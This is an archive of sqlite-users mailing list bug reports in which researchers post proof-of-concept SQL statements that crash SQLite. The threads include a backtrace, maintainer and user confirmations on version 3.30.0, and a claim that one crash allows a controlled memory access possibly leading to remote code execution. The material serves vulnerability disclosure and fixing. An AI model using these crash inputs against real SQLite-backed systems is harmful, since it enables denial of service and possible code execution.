[sqlite] Crash bug in Sqlite

2020-01-03 Thread Yongheng Chen 
Hi,

We found a crash bug in sqlite. Here’s the POC:
—
CREATE VIRTUAL TABLE v0 USING rtree ( v3 AS( '1994-01-01' ) CHECK( v3 ) CHECK( 
v3 NOT LIKE 'y' ) GENERATED ALWAYS AS( ( SELECT 10.10 * AVG ( v3 ) FROM v0 
WHERE v1 = v3 ) ) , v2 , v1 ) ;
SELECT count ( * ) , max ( v3 ) FROM v0 ;
CREATE TABLE v4 ( v6 INTEGER , v5 INT ) ;
INSERT INTO v4 ( v5 ) VALUES ( 10 ) ,( 0.10 ) ;
SELECT * FROM v4 LEFT JOIN v0 ON v1 IN ( SELECT DISTINCT v6 LIMIT 0 ) AND v2 IN 
( 10 , 10 , 10 ) WHERE v1 = v1 AND v3 = 10 ;
—-

This exists in the latest development code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash bug in sqlite

2020-01-03 Thread Yongheng Chen 
Hi,

We found a crash bug in sqlite. Here’s the POC:
—
CREATE VIRTUAL TABLE v0 USING fts4 ( v1 AS( typeof ( v5 ) ) , v6 UNIQUE 
GENERATED ALWAYS AS( v5 ) , v2 INT , v3 INT UNIQUE GENERATED ALWAYS AS( NULL ) 
, v4 INTEGER UNIQUE , v5 DOUBLE PRIMARY KEY CHECK( v4 ) , v7 VARCHAR(20) UNIQUE 
) ;
INSERT INTO v0 ( v5 ) VALUES ( 9223372036854775808.00 );
REPLACE INTO zipfile SELECT * FROM v0 WHERE EXISTS ( SELECT v2 FROM v0 
INTERSECT SELECT v4 FROM v0 ) ;
—-

This exists in the latest development code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash Bug In sqlite

2019-12-31 Thread Yongheng Chen 
Hi, 

We found a crash bug in sqlite. Here’s the POC:
—
CREATE VIRTUAL TABLE v0 USING fts4 ( v1 , v2 , v3 , v4 ) ;
INSERT INTO v0 ( v1 ) VALUES ( 10 ) ,( 10 ) ; 
CREATE TABLE v5 ( v6 UNIQUE NOT NULL PRIMARY KEY UNIQUE ) ; 
INSERT INTO v5 ( v6 , v6 ) SELECT nullif ( DISTINCT zeroblob ( julianday () ) , 
v3 ) , v1 + 10 FROM v0 ;
—

Here’s the backtrace:
—
#0  __memcmp_sse4_1 () at ../sysdeps/x86_64/multiarch/memcmp-sse4.S:69
#1  0x00661302 in sqlite3BlobCompare (pB1=, 
pB2=) at sqlite3.c:81071
#2  0x0063d703 in sqlite3VdbeMemAboutToChange (pVdbe=, 
pMem=) at sqlite3.c:75954
#3  0x00626b49 in sqlite3VdbeExec (p=) at sqlite3.c:85159
#4  0x004b076b in sqlite3Step (p=) at sqlite3.c:82730
#5  sqlite3_step (pStmt=) at sqlite3.c:17259
#6  0x00484686 in exec_prepared_stmt (pArg=0x7fff5a635990, 
pStmt=0x1956950) at shell.c:11383
#7  0x00442eea in shell_exec (pArg=, zSql=, pzErrMsg=) at shell.c:11688
#8  0x00487ad8 in runOneSqlLine (p=0x7fff5a635990,
zSql=0x193b480 "CREATE VIRTUAL TABLE v0 USING fts4 ( v1 , v2 , v3 , v4 ) ; 
INSERT INTO v0 ( v1 ) VALUES ( 10 ) ,( 10 ) ; CREATE TABLE v5 ( v6 UNIQUE NOT 
NULL PRIMARY KEY UNIQUE ) ; INSERT INTO v5 ( v6 , v6 ) SELECT n"...,
in=0x7f6b75fe38e0 <_IO_2_1_stdin_>, startline=1) at shell.c:18269
#9  0x00449a9f in process_input (p=) at shell.c:18369
#10 0x00418fb2 in main (argc=, argv=) at 
shell.c:19135
—

The bug exists in the latest development code. 

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] Crash bug in sqlite

2019-12-24 Thread Richard Hipp 
On 12/24/19, Yongheng Chen  wrote:
> Hi,
>
> We found a crash bug in sqlite.

Introduced yesterday afternoon by check-in
https://sqlite.org/src/info/eb95dac7f6482c36


-- 
D. Richard Hipp
d...@sqlite.org
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash bug in sqlite

2019-12-24 Thread Yongheng Chen 
Hi,

We found a crash bug in sqlite. Here’s the PoC:
—
CREATE TABLE v0 ( v1 INTEGER PRIMARY KEY ) ; INSERT INTO v0 ( v1 ) VALUES ( 0 ) 
,( 1 ) ,( 10 ) ON CONFLICT DO NOTHING ; 
CREATE VIRTUAL TABLE v2 USING rtree ( v5 UNIQUE ON CONFLICT ABORT , v4 , v3 ) ; 
SELECT 'MED BOX' - 'a' FROM v0 LEFT JOIN v2 ON v4 = 10 OR v5 = 10 ; SELECT * 
FROM v0 , v0 WHERE v1 = v1 AND v1 = 1;
—
The bug exists in the latest development code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] Crash Bug in Sqlite

2019-12-19 Thread Jose Isaias Cabrera 

Yongheng Chen, on Thursday, December 19, 2019 04:29 PM, wrote...
>
> Hi,
>
> We found another crash in Sqlite. Here’s the POC:
> —
> CREATE TABLE v0 ( v1 , v2 ) ;
> SELECT 10 , 1 UNION SELECT v2 , dense_rank () OVER( ORDER BY - 10 ) FROM
> v0 ;
> —
>
> This bug exists in both the latest development code and the release code.

Indeed, sqlite v3.30.0 for Windows crashes with this set of instructions...

josé
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash Bug in Sqlite

2019-12-19 Thread Yongheng Chen 
Hi,

We found another crash in Sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v1 , v2 ) ; 
SELECT 10 , 1 UNION SELECT v2 , dense_rank () OVER( ORDER BY - 10 ) FROM v0 ;
—

This bug exists in both the latest development code and the release code. 

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] Crash bug in Sqlite

2019-12-19 Thread Jose Isaias Cabrera 

Yongheng Chen, on Thursday, December 19, 2019 01:21 PM, wrote...
>
> Hi,
>
> We found another crash in Sqlite. Here’s the POC:
> —
> CREATE TABLE v0 ( v1 INTEGER PRIMARY KEY ) ;
> CREATE VIEW v2 ( v3 ) AS SELECT DISTINCT ( SELECT DISTINCT v1 , v1 , v1 ,
> v3 , v1 , v3 , v1 , 10.10 ) ;
> CREATE TABLE v4 ( v5 INTEGER PRIMARY KEY , v6 INT );
> DELETE FROM v0 WHERE NULL BETWEEN ( SELECT v1 FROM v0 AS x GROUP BY v1
> ORDER BY 10 + sum ( v1 ) OVER( ORDER BY - 10 ) DESC ) AND 10 ;

Entering each of those lines above, one at a time, when I hit enter after the 
last line above,
sqlite3 crashes right after.  So, I don't even need the line below.  This is 
using sqlite3
v3.30.0 in Windows.  Just an FYI.

> SELECT * FROM v4 , v2 WHERE v3 = v3 AND v3 = 10;
> —
>
> This bug exists in both the latest development code and the release code.
> (And thanks josé for the confirmation every time we report a bug).

You're welcome.  I have SQlite3 tool opened, so it's a "nice copy and paste" 
and see your
replication text/steps go to work. ;-)

josé
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash bug in Sqlite

2019-12-19 Thread Yongheng Chen 
Hi,

We found another crash in Sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v1 INTEGER PRIMARY KEY ) ;
CREATE VIEW v2 ( v3 ) AS SELECT DISTINCT ( SELECT DISTINCT v1 , v1 , v1 , v3 , 
v1 , v3 , v1 , 10.10 ) ;
CREATE TABLE v4 ( v5 INTEGER PRIMARY KEY , v6 INT );
DELETE FROM v0 WHERE NULL BETWEEN ( SELECT v1 FROM v0 AS x GROUP BY v1 ORDER BY 
10 + sum ( v1 ) OVER( ORDER BY - 10 ) DESC ) AND 10 ;
SELECT * FROM v4 , v2 WHERE v3 = v3 AND v3 = 10;
—

This bug exists in both the latest development code and the release code. (And 
thanks josé for the confirmation every time we report a bug).

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] Crash bug in Sqlite

2019-12-19 Thread Jose Isaias Cabrera 

Yongheng Chen, on Thursday, December 19, 2019 09:54 AM, wrote...
>
> Hi,
>
> We found another crash in Sqlite. Here’s the POC:
> —
> CREATE TABLE v0 ( v7 FLOAT , v3 DOUBLE , v6 TEXT , v1 INTEGER UNIQUE , v5
> DOUBLE , v2 VARCHAR(20) UNIQUE , v4 ) ;
> REPLACE INTO v0 ( v6 , v3 , v2 ) VALUES ( 10 , 10 , 10 );
> CREATE VIRTUAL TABLE v8 USING zipfile ( v9 DOUBLE ) ;
> REPLACE INTO v8 SELECT * FROM v0;
> —
>
> This bug exists in both the latest development code and the release code.

Crash confirmed in Windows Sqlite3 v3.30.0. Just fyi...

josé
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash bug in Sqlite

2019-12-19 Thread Yongheng Chen 
Hi,

We found another crash in Sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v7 FLOAT , v3 DOUBLE , v6 TEXT , v1 INTEGER UNIQUE , v5 
DOUBLE , v2 VARCHAR(20) UNIQUE , v4 ) ;
REPLACE INTO v0 ( v6 , v3 , v2 ) VALUES ( 10 , 10 , 10 );
CREATE VIRTUAL TABLE v8 USING zipfile ( v9 DOUBLE ) ;
REPLACE INTO v8 SELECT * FROM v0;
—

This bug exists in both the latest development code and the release code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] Crash bug in Sqlite

2019-12-18 Thread Jose Isaias Cabrera 

Yongheng Chen, on Wednesday, December 18, 2019 10:45 AM, wrote...
>
> Hi,
>
> We found another crash in Sqlite. Here’s the POC:
>
> —
> CREATE TABLE v0 ( v2 INTEGER UNIQUE ON CONFLICT IGNORE , v1 TEXT PRIMARY
> KEY ) ;
> CREATE VIEW v3 ( v4 ) AS SELECT v2 IN ( 9223372036854775808 , ( printf ()
> IN ( 0 , 0 ) ) , 10 , 10 , 10 ) AS AVG_YEARLY FROM v0 ;
> CREATE TABLE v5 ( v6 , v7 ) ; INSERT INTO v0 VALUES ( 1.10 , 'y' ) ;
> INSERT INTO v5 VALUES ( 10 , 10 ) ;
> INSERT INTO v0 VALUES ( 10 , 10 ) ;
> SELECT DISTINCT v4 FROM v0 LEFT JOIN v3 ON v4 = 10 OR v4 = v3 . v4 ORDER
> BY v4 ;
> —
>
> This bug exists in both the latest development code and the release code.

Yep, took down sqlite3.exe with 3.30.0.  Just fyi.

josé
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash bug in Sqlite

2019-12-18 Thread Yongheng Chen 
Hi,

We found another crash in Sqlite. Here’s the POC:

—
CREATE TABLE v0 ( v2 INTEGER UNIQUE ON CONFLICT IGNORE , v1 TEXT PRIMARY KEY ) ;
CREATE VIEW v3 ( v4 ) AS SELECT v2 IN ( 9223372036854775808 , ( printf () IN ( 
0 , 0 ) ) , 10 , 10 , 10 ) AS AVG_YEARLY FROM v0 ;
CREATE TABLE v5 ( v6 , v7 ) ; INSERT INTO v0 VALUES ( 1.10 , 'y' ) ;
INSERT INTO v5 VALUES ( 10 , 10 ) ; 
INSERT INTO v0 VALUES ( 10 , 10 ) ; 
SELECT DISTINCT v4 FROM v0 LEFT JOIN v3 ON v4 = 10 OR v4 = v3 . v4 ORDER BY v4 ;
—

This bug exists in both the latest development code and the release code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] Crash Bug in Sqlite

2019-12-17 Thread Yongheng Chen 
It’s Yongheng & Rui. Sorry for the typo.

> On Dec 17, 2019, at 4:58 PM, Jose Isaias Cabrera  wrote:
> 
> 
> Yongheng Chen, on Tuesday, December 17, 2019 04:21 PM, wrote...
>> 
>> Hi,
>> 
>> We found a bug that crashes Sqlite. Here’s the test case:
>> 
>> ——
>> CREATE TABLE v0 ( v1 UNIQUE , v2 VARCHAR(80) NULL PRIMARY KEY ) ;
>> CREATE VIEW v3 ( v4 ) AS SELECT max ( ( SELECT count ( v1 ) OVER( ORDER
>> BY 10 ASC ) ) ) FROM v0 ;
>> SELECT * FROM v3 WHERE - 'b' >= v4 AND v4 > 10 OR ( v4 BETWEEN 10 AND 10
>> );
>> ——
>> 
>> This bug exists in both the development code and the latest release code.
> 
> Yep, 3.30.0 has the problem.
> 
> josé
> ___
> sqlite-users mailing list
> sqlite-users@mailinglists.sqlite.org 
> 
> http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users 
> 
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] Crash Bug in Sqlite

2019-12-17 Thread Yongheng Chen 
We just took a look at the bug. The value of the accessed address in the crash 
point can be controlled by the value in the second line of the test input, 
which means:

——
…….
CREATE VIEW v3 ( v4 ) AS SELECT max ( ( SELECT count ( v1 ) OVER( ORDER BY 1234 
ASC ) ) ) FROM v0 ; 
….. 
—— — 

Then address 1234 will be accessed. We think this has the potential of 
achieving RCE.

Yongheng & Chen


> On Dec 17, 2019, at 4:58 PM, Jose Isaias Cabrera  wrote:
> 
> 
> Yongheng Chen, on Tuesday, December 17, 2019 04:21 PM, wrote...
>> 
>> Hi,
>> 
>> We found a bug that crashes Sqlite. Here’s the test case:
>> 
>> ——
>> CREATE TABLE v0 ( v1 UNIQUE , v2 VARCHAR(80) NULL PRIMARY KEY ) ;
>> CREATE VIEW v3 ( v4 ) AS SELECT max ( ( SELECT count ( v1 ) OVER( ORDER
>> BY 10 ASC ) ) ) FROM v0 ;
>> SELECT * FROM v3 WHERE - 'b' >= v4 AND v4 > 10 OR ( v4 BETWEEN 10 AND 10
>> );
>> ——
>> 
>> This bug exists in both the development code and the latest release code.
> 
> Yep, 3.30.0 has the problem.
> 
> josé
> ___
> sqlite-users mailing list
> sqlite-users@mailinglists.sqlite.org 
> 
> http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users 
> 
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] Crash Bug in Sqlite

2019-12-17 Thread Jose Isaias Cabrera 

Yongheng Chen, on Tuesday, December 17, 2019 04:21 PM, wrote...
>
> Hi,
>
> We found a bug that crashes Sqlite. Here’s the test case:
>
> ——
> CREATE TABLE v0 ( v1 UNIQUE , v2 VARCHAR(80) NULL PRIMARY KEY ) ;
> CREATE VIEW v3 ( v4 ) AS SELECT max ( ( SELECT count ( v1 ) OVER( ORDER
> BY 10 ASC ) ) ) FROM v0 ;
> SELECT * FROM v3 WHERE - 'b' >= v4 AND v4 > 10 OR ( v4 BETWEEN 10 AND 10
> );
> ——
>
> This bug exists in both the development code and the latest release code.

Yep, 3.30.0 has the problem.

josé
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash Bug in Sqlite

2019-12-17 Thread Yongheng Chen 
Hi, 

We found a bug that crashes Sqlite. Here’s the test case:

——
CREATE TABLE v0 ( v1 UNIQUE , v2 VARCHAR(80) NULL PRIMARY KEY ) ; 
CREATE VIEW v3 ( v4 ) AS SELECT max ( ( SELECT count ( v1 ) OVER( ORDER BY 10 
ASC ) ) ) FROM v0 ; 
SELECT * FROM v3 WHERE - 'b' >= v4 AND v4 > 10 OR ( v4 BETWEEN 10 AND 10 );
——

This bug exists in both the development code and the latest release code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users